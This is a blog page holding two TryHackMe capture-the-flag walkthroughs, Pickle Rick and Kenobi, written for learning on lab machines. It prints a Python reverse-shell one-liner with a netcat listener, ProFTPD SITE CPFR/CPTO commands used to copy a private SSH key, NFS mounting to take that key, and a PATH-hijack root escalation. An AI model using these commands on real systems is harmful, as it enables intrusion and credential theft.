I’m super excited to start this learning path and will be pouring my heart and soul into it now that I’m back from Paris. You can probably expect daily videos and posts from me going through each of the rooms in this learning path. So, if you are interested in hacking or are looking for a way to increase your technical skills and security knowledge then why not sign up and give it ago? I can honestly say that I haven’t regretted a single second spent on TryHackMe. I have enjoyed every moment although some of those moments have tested my knowledge to their limits. However, their material is easy to digest and also a great resource to come back to when you are on a job that uses that particular technology.

I’M PICKLE RICK! wubba lubba dub dub | TryHackMe

Posted on July 2, 2022July 2, 2022 by Jonobi Musashi

Hello World and welcome to HaXeZ, in this post I’m going to be doing the Pickle Rick room on TryHackMe. This is a fun easy room that requires some basic enumeration and then web application exploitation via code execution.

Scanning Pickle Rick

Ok, so the first thing we need to do is scan the box. To do that we’re going to use our favorite tool Nmap. As seen below, I ran the Nmap scan with the “-sC” flag set for safe scripts. The “-sV” flag set for service versions and then I specified all ports with “-p0-” and then gave it the IP address. As you can see, the results of the Nmap scan show that there are only two ports listening. Port 22 for Secure Shell and port 80 for an Apache Web Server.

sudo nmap -sC -sV -p0- 10.10.118.227 -T4

Exploring The Web Server

As it was unlikely that the room creator wanted us to brute-force SSH, I headed over to the web server. Show Me What You Got!. Upon visiting the web server I was greeted with a Rick and Morty themed website. Furthermore, it looks as though Rick has left Morty a message asking him for help.

Additionally, viewing the page source of the application revealed the username of R1ckRul3s within an HTML comment. The page source also gave away the location of the assets folder. As can be seen, the CSS and Javascript files were being called from the assets directory.

Navigating to the assets directory didn’t reveal much more information. However, it did have directory listening enabled. If this was a web application security assessment, I would definitely report this. While the information contained in the directory doesn’t any sensitive information now. It could do in the future.

Pickle Rick Foothold

After a bit more poking around, I stumbled upon the robots.txt file. Normally these files are used to tell web servers not to index certain pages. However, this one appeared to contain the string “Wubbalubbadubdub”. At first, I thought it was nonsense, but it is not nonsense at all. In bird person’s native tongue it means “I am in great pain, please help me”. References aside, this is the password that goes with the “R1ckRul3s” username we found earlier.

I ran dirb with a custom wordlist against the web application and found a login.php page. Admittedly, I should have found this page without dirb. When doing web application assessments, it’s a good idea to look for login pages with the extension being used (PHP, ASP, ASPX).

Most of the pages were protected and could only be accessed by the Rickest Rick or something. However, I was able to access the commands page. This allowed me to run commands such as “ls” to see the contents of the current directory. It was there I discovered the first ingredient in a text file called “Sup3rS3cretP1ckl3Ingred.txt” or something. I wasn’t able to use “cat” on the file, likely due to command blacklisting. However, I could use “less” on the file which gave me the first ingredient.

Popping Shells

As we have now confirmed that command execution is possible. We should be able to get a reverse shell from the application back to our hacker machine. To do this I visited the PayloadsAllTheThings GitHub repository and stole a python one-liner.

Next, using NetCat I opened a portal to dimension 4242 (because of the meaning of life) on my attacker machine. This is the portal that our snake payload is going to come through once executed by the web application. I’m well aware that there are hundreds of better snake jazz jokes I could make here but cba.

sudo nc -lvnp 4242

Finally, I modified the snake one-liner to change it to python 3. I also change the localhost address to the address of my tun0 TryHackMe VPN IP address. I then copied the payload and pasted it into the command input box and hit the execute command.

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Pickle Rick Privilege Escalation

Sure enough, the portal to dimension 4242 was opened. The snake army commenced their invasion of the Pickle Rick web server. They slithered around for a bit and found that they had landed on the server as www-data. However, www-data had sudo privileges to do everything without a password. They used these privileges for their own nefarious purposes and elevated their privileges to root. From there they were able to capture the second ingredient found in the /home/rick directory. They then advanced to the /root directory where they were able to steal the third ingredient. It was only a matter of time before they turned Rick back into a human and took over the world.

Conclusions

This was a really fun box, I always try not to use words like really and very in my writing as they are unnecessary. However, this box was really fun. I probably enjoyed it more because I am a BIG (again unnecessary wordage) fan of Rick and Morty. I’m also a sucker for boxes with a strong theme as I love the added immersion that it adds. While this box was listed as easy, I do feel the privilege escalation could have been harder. Would have loved to have had to escalate to the Rick user first. And then to root by using a bespoke Rick and Morty themed science binary with unquoted binary paths or something. Perhaps the simplicity of it is what made me enjoy it more, who knows. Anyway, that’s all I have for you. Please check out the video to give me more views, and subscribe if you want.

Pickle Rick Video Walkthrough

Hack Like A Jedi | Kenobi | TryHackMe

Posted on June 23, 2022July 1, 2022 by Jonobi Musashi

Hello World and welcome to HaXeZ, in this post we’re going to be channeling our inner Jedi and taking on the TryHackMe Kenobi room. This room requires you to perform some enumeration to identify services. Then, you need to enumerate SAMBA, NFS, and FTP. Next, you need to exploit a vulnerability in FTP to steal Kenobi’s private key and SSH to the server. Once on the server as Kenobi, you can escalate your privileges to root via a SUID file that uses unquoted paths.

Kenobi Enumeration

First, I ran a Nmap scan with the safe scripts, service version, and operating system detection flags set. This revealed that there were 7 ports listening on the host. As can be seen, the important services found were FTP, SSH, HTTP, NFS, and Samba.

sudo nmap -sC -sV -O 10.10.182.106 -T4

Kenobi SAMBA Enumeration

Once the Nmap scan was complete, I enumerated the SAMBA shares. There are several Nmap scripts that can enumerate Samba shares, as seen in the image below. In short, the scripts used were ‘smb-enum-shares’ and ‘smb-enum-users’. As can be seen, it was possible to identify a total of 3 shares on the host. Furthermore, the IPC$ and Anonymous shares had read and write access.

sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.182.106

Accessing SAMBA Shares

Using a tool called smbclient, it was possible to access the SAMBA shares and view the files. As a result, the Anonymous share (mapped to C:\home\kenobi\share) had a file called log.txt. I downloaded that file using the get command and opened a new tab to read the contents. Notably, the log file mentioned an SSH key being generated as well as the ProftpD service running on port 21.

Kenobi NFS Enumeration

After reviewing the results of the Nmap scan from earlier, I noticed that NFS was open on ports 111 and 2049. NFS is short for Network File System and is another way to share directories and files on the network. With this in mind, I enumerated the NFS service using a number of Nmap scripts. As can be seen below, the NFS share was exposing the /var directory.

sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.182.106

Finding Vulnerabilities With Searchsploit

It’s time to start looking for a way to gain access to the machine. From our Nmap scan, we know that we have access to the /var NFS share. We also know that FTP is running and that at some point an SSH key was created. I used Searchsploit to look for vulnerabilities in the ProFTPD 1.3.5 service. The results indicate that there is a command execution vulnerability in this version of ProFTPD.

sudo searchsploit ProFTPD 1.3.5

Exploiting FTP

Ordinarily, FTP will only grant us access to the directories and files in the directory specified in the FTP configuration file. However, as this version of FTP is vulnerable and is running as the Kenobi user, we can leverage that. We can copy the SSH key mentioned in the log file, and move it to a directory that we can access such as the NFS share /var. To do this we use the ‘SITE CPFR’ and ‘SITE CPTO’ commands as shown below.

nc 10.10.182.106 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

Stealing The SSH Key From NFS

Now that the SSH key is on the /var NFS share, we can mount that share and steal the key. In order to do this, we’re going to use the mount command. First, we need to make a directory to mount the NFS share to. I created a directory in ‘/mnt’ called kenobi2. Next, I mounted the ‘/var’ directory to that newly created directory and stole the SSH key.

sudo mkdir /mnt/kenobi2
sudo mount 10.10.182.106:/var /mnt/kenobi2
sudo cp /mnt/kenobi2/tmp/id_rsa ~/id_rsa

Kenobi Foothold

Now that we have Kenobi’s SSH private key we should be able to access the machine. First we need to change the permissions on the key to 600 to please the SSH gods. Once that is done we can SSH to the box using the SSH key which will grant us our foothold into the machine.

System Enumeration

Before we elevate our privileges to root and own the entire system, we need to find a way to do so. One common method of privilege escalation on the Linux system is via programs with the sticky bit set. The sticky bit means that the program retains root privileges when run by a normal user. There is more to it but I won’t explain the details in this write-up. So, we need to find all the files with the sticky bit set. The screenshot below shows the results of a find command used to find sticky bits. Essentially, it is looking for all files where the permissions have the sticky bit and then sending errors to ‘/dev/null’.

find / -perm -u=s -type f 2>/dev/null

Poking The Program

If you run the same command on your local system, you will notice that the ‘/usr/bin/menu’ binary is uncommon. Running this binary shows us that the program is indeed a bespoke program and it gives us three options.

If we run strings against that binary, we can get an idea of what’s going on. Furthermore, we can see how the creator of this binary made a crucial mistake. We can see that the three options correspond to three system binaries (curl, uname, and ifconfig). Unfortunately for the creator, but fortunately for us, they forgot to include the full path to the binary. As this is running with the sticky bit set we can modify our ‘$PATH’ environmental variable and create our own malicious versions of these binaries.

Kenobi Privilege Escalation

First, I changed my directory to ‘/tmp’. Then I echoed the contents of the ‘/bin/sh’ binary into a file called curl. This will be our replacement malicious binary. I then gave the newly created curl binary, read, write, and execute privileges. Finally, I exported the ‘/tmp’ path in to our ‘$PATH’ environmental variable. Now, when we run the ‘/usr/bin/menu’ binary, it will look for the binaries in the ‘/tmp’ path first. And what will it find? our malicious curl binary.

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH

Now, when we run the ‘/usr/bin/menu’ binary and select the status check options, it runs our malicious curl binary as root and spawns a shell with root privileges.

Conclusions

This box was a lot of fun, I’m sure there was more to it that I didn’t explore. For example, there was a web server that I didn’t even look at. With the finale of the Kenobi series being released, I thought there was no better time to do a walkthrough of this box. Try and cash in on those delicious keywords. There was nothing out of the ordinary on this box, very typical enumeration and exploitation but it was still a fun box. Anyway, I hope you enjoyed the write-up, feel free to watch the video below.